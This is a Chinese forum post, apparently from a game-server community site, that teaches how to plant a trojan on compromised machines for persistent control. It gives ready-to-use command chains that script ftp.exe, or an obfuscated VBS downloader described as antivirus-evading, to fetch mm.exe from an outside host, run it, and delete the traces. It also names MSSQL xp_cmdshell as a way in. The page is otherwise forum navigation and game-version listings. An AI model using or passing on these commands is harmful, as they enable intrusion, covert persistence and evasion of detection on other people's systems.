设为首页
收藏本站
开启辅助访问
切换到宽版
登录
立即注册
只需一步,快速开始
首页
Portal
论坛
BBS
新鲜出炉
免费列表
联系我们
搜索
搜索
文章
安全
安全
统计
传奇版本
精品软件
传奇工具
水漫金山
传奇教程
福利经验
传奇技术
素材补丁
引擎帮助
网站程序
动画发布
开区工具
站点公告
传奇故事
站点版规
关于报毒
在线工具
违规处里
站点帮助
站务处理
本版
帖子
用户
传奇GM论坛
»
论坛
›
精品版本
›
微端版本
›
入侵之命令行下载、运行木马
返回列表
发新帖
入侵之命令行下载、运行木马
[复制链接]
232
|
0
|
2012-4-1 19:21:52
|
显示全部楼层
|
阅读模式
如何保持长久上线,防止动态ip或者域名变化导致找不到肉鸡。这需要种植木马,且这个木马要能够往外面咱们自己的服务器或者邮箱等报告自己的运行状态。如何下载木马并种植到肉鸡上面的问题,其实网上也有零散的,我这儿算是整理,同时加上自己的体会。大家还是多实践,多搞搞肉鸡(最好练习命令行,3389登陆上去一对记录,如被追踪很危险的。
其实我更相信,图形界面下能操作的,命令行都能操作正如windows下能搞的,linux下都能做到)这儿命令行可以是mssql1433得到的xp_cmdshell等。
木马下载无非是ftp跟http的网页下载两种方式,这儿分别介绍:
1.ftp下载
这儿是使用肉鸡system32目录下的ftp.exe来访问我们放置木马的ftp服务。
显然要解决输入帐号密码的问题,同时要制定命令让远程的ftp.exe执行,
从而下载文件。还好,这些都可以通过命令来解决。
假设木马文件在服务器ftpxx.3322.org下,帐号为ftpxx,密码为3322,文件为mm.exe。
通过命令行
===========================
echoftpxxx>ftp.txt
echo3322>>ftp.txt
echogetmm.exe>>ftp.txt
echobye>>ftp.txt
ftp-s:ftp.txtftpxx.3322.org
===========================
则根据前一篇文章的&用法,也可以用一句命令完成:
echoftpxxx>ftp.txt&echo3322>>ftp.txt&echogetmm.exe>>ftp.txt&echobye>>ftp.txt&ftp-s:ftp.txtftpxx.3322.org
这样就下载成功了。
下一步是执行木马并删除记录:
也就是一句话(三个语句):
mm.exe&delftp.txt&delmm.exe
2.html下载
这儿是使用肉鸡system32目录下的wscript.exe来执行指定的vbs脚本访问我们放置木马的http服务器。
假设木马地址为:http://ftpxx.3322.org/mm.exemm.exe
通过命令行(无需任何修改,我已做免杀,除非被杀了,可以修改脚本)
==========================
@echowithwscript:if.arguments.count^<2-0+0-0+0then.quit:endif>thisis.vbs
@echosetaso=.createobject("adodb.stream"):setthisisweb=createobject("mi"+"cr"+"o"+"s"+"o"+"ft.x"+"ml"+"h"+"ttp")>>thisis.vbs
@echothisisweb.open"g"+"e"+"t",.arguments(0),0:thisisweb.send:ifthisisweb.status^>200then.echo"E"+"r"+"r"+"o"+"r"+":"+thisisweb.status:.quit>>thisis.vbs
@echoaso.type=1-0+0-0+0:aso.open:aso.writethisisweb.responsebody:aso.savetofile.arguments(1-0+0-0+0),2-0+0-0+0:endwith>>thisis.vbs
Typethisis.vbs
=============================
下一步是执行木马并删除记录:
也就是一句话(三个语句):
cscriptthisis.vbshttp://ftpxx.3322.org/mm.exemm.exe&delthisis.vbs&delmm.exe
或者简单的方法是(会弹出网页!):
STARTits:http://ftpxx.3322.org/mm.exe
下载后,
DIR/A/S"C:\DocumentsandSettings\DefaultUser\LocalSettings\TemporaryInternetFiles\Content.IE5\*.EXE"
列出路径后,执行。
这儿帐号DefaultUser也可能是当前用户
*
发帖前要善用
【
论坛搜索
】
功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
返回列表
发新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
沙城主
回复楼主
返回列表
图文推荐
传世1.994天元心法版,啸天虎,副本任务,珍宝阁奖励
2011-06-30
最新烟雨寒雪暴力来袭靓装四连击传奇版本,给力嚣张,傲世青龙(3K引擎)
2011-07-01
新注册会员无法接收到验证邮件问题及解决方法
2011-12-17
2011最新火爆3D真彩地图,1.96梦幻变身QQ三钻黄金皓月升级版(...
2011-06-20
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2012-03-30
热门排行
1
2003复古蓝色飞刀我本沉默,倚天劈地,押镖系统,九绝剑魔(Her...
2
超爽给力3D真彩韩版诸神灭佛中变版,皇冠至尊,天地归一(Her...
3
1.96紫仙刺影四钻元素轻变版,冰神皓月,黄金矿工,紫仙合成(...
4
独家四皇冠《救世主》3D真彩地图中变靓装版,终结者神地(H...
5
2012最新青龍白虎中变皇冠之神靓装版,龙神宝殿,白虎之都(H...
6
1.95龙战刺影神龙合击版,刺影之城,神龙之地,幽冥神盾(3k引擎)
7
New盟重新城暗杀来袭第八季武动乾坤,枯海神舰,斗气大陆(Ma...
8
1.76复古精品加强版,爵位封号,亡灵古墓,夺宝奇兵,精品神殿(Hero引擎)